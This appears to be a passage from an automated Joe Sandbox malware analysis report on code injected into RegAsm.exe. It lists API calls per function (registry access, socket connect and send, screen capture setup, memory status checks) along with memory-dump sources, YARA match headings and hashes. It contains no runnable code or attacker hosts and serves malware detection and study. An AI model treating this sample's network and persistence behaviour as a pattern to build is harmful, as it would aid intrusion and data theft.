• RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
• RegQueryValueExA.KERNEL32 ref: 00413622
• RegCloseKey.KERNEL32(?), ref: 0041362D
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: CloseOpenQueryValue
• String ID:
• API String ID: 3677997916-0
APIs
• RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000), ref: 0041374F
• RegQueryValueExA.KERNEL32 ref: 00413768
• RegCloseKey.KERNEL32(00000000), ref: 00413773
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: CloseOpenQueryValue
• String ID:
• API String ID: 3677997916-0
APIs
• RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004135A4
• RegQueryValueExA.KERNEL32 ref: 004135C2
• RegCloseKey.KERNEL32(?), ref: 004135CD
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: CloseOpenQueryValue
• String ID:
• API String ID: 3677997916-0
APIs
• RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 00413551
• RegQueryValueExA.KERNEL32 ref: 00413565
• RegCloseKey.KERNEL32(?), ref: 00413570
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: CloseOpenQueryValue
• String ID:
• API String ID: 3677997916-0
APIs
• RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
• RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004), ref: 004138DB
• RegCloseKey.ADVAPI32(004660B4), ref: 004138E6
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: CloseCreateValue
• String ID:
• API String ID: 1818849710-0
                                                                                                                                  • Opcode ID: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                                                                                                                                  • Instruction ID: 04d77b696783773a8a307df6842786532c8303179302b097fa31242bc3118ae5
                                                                                                                                  • Opcode Fuzzy Hash: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                                                                                                                                  • Instruction Fuzzy Hash: 1EE06D72500318FBDF109FA0DC06FEA7BACEF04B62F104565BF09A6191D6358E14E7A8
                                                                                                                                  APIs
                                                                                                                                  • GdiplusStartup.GDIPLUS(00474ACC,?,00000000,00000000), ref: 004187FA
                                                                                                                                    • Part of subcall function 004048C8: connect.WS2_32(FFFFFFFF,02084830,00000010), ref: 004048E0
                                                                                                                                    • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: GdiplusStartupconnectsend
                                                                                                                                  • String ID: NG
                                                                                                                                  • API String ID: 1957403310-1651712548
                                                                                                                                  • Opcode ID: ac95375dd8309d9e0ed2265105671e99074506a039fa72e05eb7aa568a42b0db
                                                                                                                                  • Instruction ID: 646e85ae029ebb21aec6d49858a727e037fa7bb3a6359959f193cd142bf324ca
                                                                                                                                  • Opcode Fuzzy Hash: ac95375dd8309d9e0ed2265105671e99074506a039fa72e05eb7aa568a42b0db
                                                                                                                                  • Instruction Fuzzy Hash: 8E41D4713042015BC208FB22D892ABF7396ABC0358F50493FF54A672D2EF7C5D4A869E
                                                                                                                                  APIs
                                                                                                                                  • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0044EE69
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Info
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1807457897-3916222277
                                                                                                                                  • Opcode ID: c218bb7fec2994ea758599c37fad7e7d2b1b4cc9144a8923480740bb4dc68c2e
                                                                                                                                  • Instruction ID: 2d4132b881e94a0a9fd0de77a922cbe9b4a8b8c61ff6a95216f325efaac8b060
                                                                                                                                  • Opcode Fuzzy Hash: c218bb7fec2994ea758599c37fad7e7d2b1b4cc9144a8923480740bb4dc68c2e
                                                                                                                                  • Instruction Fuzzy Hash: 7E411070504748AFEF218E25CC84AF7BBB9FF45304F2404EEE59987142D2399A46DF65
                                                                                                                                  APIs
                                                                                                                                  • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 10005CB2
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.920353796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.920348667.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.920353796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __crt_fast_encode_pointer
                                                                                                                                  • String ID: fYM/
                                                                                                                                  • API String ID: 3768137683-2459865102
                                                                                                                                  • Opcode ID: 309bc129bf2195ff1d9c64394061bd6fc65cf8cbf03cde5b7a92afcb69d4c1ae
                                                                                                                                  • Instruction ID: bece27fcde9612dcc576c905fc453b1e46dde912844247b60aafe4dc7e802519
                                                                                                                                  • Opcode Fuzzy Hash: 309bc129bf2195ff1d9c64394061bd6fc65cf8cbf03cde5b7a92afcb69d4c1ae
                                                                                                                                  • Instruction Fuzzy Hash: D0118F37A007259FFB26DE18DD9095B73E5EB843E17168220ED18AB258DA32EC0196A1
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _wcslen
                                                                                                                                  • String ID: pQG
                                                                                                                                  • API String ID: 176396367-3769108836
                                                                                                                                  • Opcode ID: 5581d9da4b44419582c52f90d2dac08d2b870ca85f72c258eca40ba8ececd965
                                                                                                                                  • Instruction ID: e26466b944e621eef81fbe5db30e3e3b172770e45cde188e8c087a2518f8d89f
                                                                                                                                  • Opcode Fuzzy Hash: 5581d9da4b44419582c52f90d2dac08d2b870ca85f72c258eca40ba8ececd965
                                                                                                                                  • Instruction Fuzzy Hash: 631181319002059BCB15EF66E852AEF7BB4AF54314B10413FF446A62E2EF78AD15CB98
                                                                                                                                  APIs
                                                                                                                                  • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000001,?,?), ref: 00448CA4
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: String
                                                                                                                                  • String ID: LCMapStringEx
                                                                                                                                  • API String ID: 2568140703-3893581201
                                                                                                                                  • Opcode ID: 4e10c201ebb2099c74eb4779768ff64867bf24b434018514e16e99dc8bd4ef65
                                                                                                                                  • Instruction ID: c3f282dcf0fd97a5c368a601407465e3bede0a00add2935535d0592c00eac712
                                                                                                                                  • Opcode Fuzzy Hash: 4e10c201ebb2099c74eb4779768ff64867bf24b434018514e16e99dc8bd4ef65
                                                                                                                                  • Instruction Fuzzy Hash: 3001253254120CFBCF02AF91DD02EEE7F66EF08751F04416AFE1965161CA3A8971EB99
                                                                                                                                  APIs
                                                                                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(00000FA0,-00000020,0044BFCF,-00000020,00000FA0,00000000,00467388,00467388), ref: 00448B4F
                                                                                                                                  Strings
                                                                                                                                  • InitializeCriticalSectionEx, xrefs: 00448B1F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CountCriticalInitializeSectionSpin
                                                                                                                                  • String ID: InitializeCriticalSectionEx
                                                                                                                                  • API String ID: 2593887523-3084827643
                                                                                                                                  • Opcode ID: 6340ef5d4d263af2985355ee658efc66a6ef890db148a952ff0e7e01781af4fe
                                                                                                                                  • Instruction ID: 6b0d226957fc5e3530c80ec385177705bb254131620a7d42d33c8bf65efe755d
                                                                                                                                  • Opcode Fuzzy Hash: 6340ef5d4d263af2985355ee658efc66a6ef890db148a952ff0e7e01781af4fe
                                                                                                                                  • Instruction Fuzzy Hash: F0F0E93164021CFBCB025F55DC06E9E7F61EF08B22B00406AFD0956261DF3A9E61D6DD
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Alloc
                                                                                                                                  • String ID: FlsAlloc
                                                                                                                                  • API String ID: 2773662609-671089009
                                                                                                                                  • Opcode ID: 8d34d378e792ffc8bee28f5c2a12e2aa67d49de27489c3fe41b8e68b567a8336
                                                                                                                                  • Instruction ID: f8901b274c9ac7999680b04b2037e580393277d5e39e0d99f0e7f02c98ef4e36
                                                                                                                                  • Opcode Fuzzy Hash: 8d34d378e792ffc8bee28f5c2a12e2aa67d49de27489c3fe41b8e68b567a8336
                                                                                                                                  • Instruction Fuzzy Hash: 8FE05530640318F7D3016B21DC16A2FBB94DB04B22B10006FFD0553241EE794D15C5CE
                                                                                                                                  APIs
                                                                                                                                  • GetSystemTimeAsFileTime.KERNEL32(00000000,0043AB37), ref: 00448A16
                                                                                                                                  Strings
                                                                                                                                  • GetSystemTimePreciseAsFileTime, xrefs: 004489F2
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Time$FileSystem
                                                                                                                                  • String ID: GetSystemTimePreciseAsFileTime
                                                                                                                                  • API String ID: 2086374402-595813830
                                                                                                                                  • Opcode ID: c8476c07d91a2673d79eb1bf06ec4ca2dbc9f8e1099c36818990a3b57f66e430
                                                                                                                                  • Instruction ID: bacba389ed7ed90706db716b221aab5ed2509560655679cc0f09f15d90276a03
                                                                                                                                  • Opcode Fuzzy Hash: c8476c07d91a2673d79eb1bf06ec4ca2dbc9f8e1099c36818990a3b57f66e430
                                                                                                                                  • Instruction Fuzzy Hash: 79E0E531A81618FBD7116B25EC02E7EBB50DB08B02B10027FFC05A7292EE754D14D6DE
                                                                                                                                  APIs
                                                                                                                                  • GlobalMemoryStatusEx.KERNEL32(?), ref: 0041B824
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: GlobalMemoryStatus
• String ID: @
• API String ID: 1890195054-2766056989
• Opcode ID: 1ad00b6035bb2f9c69a92d20b28944e38dc856d82cbe2acb3b3194101eb7e45b
• Instruction ID: 3917006bb4bdf28dbebd301c315ba2c969ca89c82ab29e5da1363915d2377671
• Opcode Fuzzy Hash: 1ad00b6035bb2f9c69a92d20b28944e38dc856d82cbe2acb3b3194101eb7e45b
• Instruction Fuzzy Hash: EBE0C9B6901228EBCB10DFA9E94498DFBF8FF48620B008166ED08A3704D770A815CB94

APIs
• try_get_function.LIBVCRUNTIME ref: 00438E29
Strings
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: try_get_function
• String ID: FlsAlloc
• API String ID: 2742660187-671089009
• Opcode ID: 1eb4f256e7c4e0b4dee7f2b7c001ffdd8c026b266bbfd6c5aa47d90a079f9e5b
• Instruction ID: b64d3ab94c56a33c1928a034b10f94234fe941941be7f39555266fb58f36a209
• Opcode Fuzzy Hash: 1eb4f256e7c4e0b4dee7f2b7c001ffdd8c026b266bbfd6c5aa47d90a079f9e5b
• Instruction Fuzzy Hash: 09D02B31BC1328B6C51032955C03BD9B6048B00FF7F002067FF0C61283899E592082DE

APIs
• try_get_function.LIBVCRUNTIME ref: 10003B06
Strings
Memory Dump Source
• Source File: 0000000D.00000002.920353796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000D.00000002.920348667.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000D.00000002.920353796.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
Similarity
• API ID: try_get_function
• String ID: FlsAlloc
• API String ID: 2742660187-671089009
• Opcode ID: e5392f9aa55551a50589cb99c6148b67437594651e03cd2756b54b563a9e1daf
• Instruction ID: 0b7c7f44018c04906f4f2ef9afae3f4f684564eee465a9a4c05fe82f6616737e
• Opcode Fuzzy Hash: e5392f9aa55551a50589cb99c6148b67437594651e03cd2756b54b563a9e1daf
• Instruction Fuzzy Hash: 13D02B32744138B3F201B3A06C04BEEBB88D7025F2F040063FB4C5210CDB11591042E6

APIs
• GlobalMemoryStatusEx.KERNEL32(?), ref: 0041B85B
Strings
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: GlobalMemoryStatus
• String ID: @
• API String ID: 1890195054-2766056989
• Opcode ID: 2ff32e62116e468e6d8a54eb6c0bfd9d688f6c12eac0596ef65494206548ed21
• Instruction ID: 2d2b64c70bc766df394076410504e3f9c8f669937c614d63c6700d8895b1c70c
• Opcode Fuzzy Hash: 2ff32e62116e468e6d8a54eb6c0bfd9d688f6c12eac0596ef65494206548ed21
• Instruction Fuzzy Hash: E6D017B58023189FC720DFA8E804A8DBBFCFB08210F00456AEC49E3700E770E8008B94

APIs
  • Part of subcall function 0044ED6C: GetOEMCP.KERNEL32(00000000,?,?,0044EFF5,?), ref: 0044ED97
• IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0044F03A,?,00000000), ref: 0044F20D
• GetCPInfo.KERNEL32(00000000,0044F03A,?,?,?,0044F03A,?,00000000), ref: 0044F220
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: CodeInfoPageValid
• String ID:
• API String ID: 546120528-0
• Opcode ID: 747d95ecf2005c527016839393fb107aa8d78a19bbf0a74999b8906be39dfc0a
• Instruction ID: 491245c4813b68437391e3e70942b885a5b84425ef1b1be509cf98dd56c33fdc
• Opcode Fuzzy Hash: 747d95ecf2005c527016839393fb107aa8d78a19bbf0a74999b8906be39dfc0a
• Instruction Fuzzy Hash: A05153749002469EFB208F76C8816BBBBE4FF01304F1480BFD48687251E67E994A8B99

APIs
  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
  • Part of subcall function 0044F0F7: _abort.LIBCMT ref: 0044F129
  • Part of subcall function 0044F0F7: _free.LIBCMT ref: 0044F15D
  • Part of subcall function 0044ED6C: GetOEMCP.KERNEL32(00000000,?,?,0044EFF5,?), ref: 0044ED97
• _free.LIBCMT ref: 0044F050
• _free.LIBCMT ref: 0044F086
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: _free$ErrorLast_abort
• String ID:
• API String ID: 2991157371-0
• Opcode ID: b0ee2aee4096bb997892b4dec28a89a25a1db6387992807ccb6f750b77acbdfb
• Instruction ID: a9f826519387c1ac895116d2974c89b4af6d1f604a138ae73dd4863203302c4b
• Opcode Fuzzy Hash: b0ee2aee4096bb997892b4dec28a89a25a1db6387992807ccb6f750b77acbdfb
• Instruction Fuzzy Hash: 2D31D371900104AFEB10EB69D441B9A77F4EF81325F2540AFE5049B2A3DB7A5D44CB58

APIs
  • Part of subcall function 10005AF6: GetLastError.KERNEL32(?,?,10006C6C), ref: 10005AFA
  • Part of subcall function 10005AF6: _free.LIBCMT ref: 10005B2D
  • Part of subcall function 10005AF6: SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B6E
  • Part of subcall function 10005AF6: _abort.LIBCMT ref: 10005B74
  • Part of subcall function 10006D7E: _abort.LIBCMT ref: 10006DB0
  • Part of subcall function 10006D7E: _free.LIBCMT ref: 10006DE4
  • Part of subcall function 100069F3: GetOEMCP.KERNEL32(00000000,?,?,10006C7C,?), ref: 10006A1E
• _free.LIBCMT ref: 10006CD7
• _free.LIBCMT ref: 10006D0D
Memory Dump Source
• Source File: 0000000D.00000002.920353796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000D.00000002.920348667.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000D.00000002.920353796.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
Similarity
• API ID: _free$ErrorLast_abort
• String ID:
• API String ID: 2991157371-0
• Opcode ID: edadbe4ca17b1bb3a790d59a6ed19414cc5eb62636eebdfc00c28812a33e9cae
• Instruction ID: 62e76a57c0cb8018fa5258269fd2d3c97d0f5aa08c1c35bbbea2ca126a332e06
• Opcode Fuzzy Hash: edadbe4ca17b1bb3a790d59a6ed19414cc5eb62636eebdfc00c28812a33e9cae
• Instruction Fuzzy Hash: AB31D835904249AFF700CB69DD81B5D77F6EF493A0F3141A9E8049B295EB76AD40CB50

APIs
• GetProcAddress.KERNEL32(00000000,?,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000,00000364,?,00448367,00000000), ref: 004485AA
• __crt_fast_encode_pointer.LIBVCRUNTIME ref: 004485B7
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: AddressProc__crt_fast_encode_pointer
• String ID:
• API String ID: 2279764990-0
• Opcode ID: c6cf5396499d17f56fb6a2281c71017d1bec5fc69850f55703e39bd70672811c
• Instruction ID: be9fc4cf4793659cabcfb8eeb6b3f823a3a139bea871a56029073562aa2b3f0c
• Opcode Fuzzy Hash: c6cf5396499d17f56fb6a2281c71017d1bec5fc69850f55703e39bd70672811c
• Instruction Fuzzy Hash: 4B110637A00220BBFB229F1DDC4096F7395AB84364716866AFD19EB354DF34EC4186D9

APIs
• _free.LIBCMT ref: 00446227
  • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
• RtlReAllocateHeap.NTDLL(00000000,00000000,?,?,0000000F,00000000,00432F93,00000000,0000000F,0042F99D,?,?,00431A44,?,?,00000000), ref: 00446263
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: AllocateHeap$_free
• String ID:
• API String ID: 1482568997-0
• Opcode ID: b157f1fc507fc560bd00b565224a750c722b28025775eaa04a87fd2772ac9c2e
• Instruction ID: 528349031ecf72c594af6ac828cc426c74ce8c7b4bfa82022820746e0f177899
• Opcode Fuzzy Hash: b157f1fc507fc560bd00b565224a750c722b28025775eaa04a87fd2772ac9c2e
• Instruction Fuzzy Hash: 4CF0283110121176BB213B266C01B6B3759AF83B70B1700ABFC1466281CFBCCC41406F

APIs
• socket.WS2_32(00000002,00000001,00000006), ref: 00404852
• CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,0040530B,?,?,00000000,00000000,?,?,00000000,00405208,?,00000000), ref: 0040488E
  • Part of subcall function 0040489E: WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: CreateEventStartupsocket
• String ID:
• API String ID: 1953588214-0
• Opcode ID: 1e452a305f2f2717745e8e1604374189d9659e6cad2ea1bb393ee33250cb33e3
• Instruction ID: ed99eca956a2b7a9b5891d615cc725ddac26720bb1770143763ad27df005c20f
• Opcode Fuzzy Hash: 1e452a305f2f2717745e8e1604374189d9659e6cad2ea1bb393ee33250cb33e3
• Instruction Fuzzy Hash: 760171B1408B809ED7359F38A8456877FE0AB55304F048D6EF1DA97B91D3B5A881CB18
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: e70bc1220f3c0aaa69c113e67994fb024de36f7e04ed45e289cd83dd41bab85d
                                                                                                                                  • Instruction ID: 1e9d0a06bdb6e9f7b23a96960dfc4b712b0be9606a3b942e14a6d4fe6a34620f
                                                                                                                                  • Opcode Fuzzy Hash: e70bc1220f3c0aaa69c113e67994fb024de36f7e04ed45e289cd83dd41bab85d
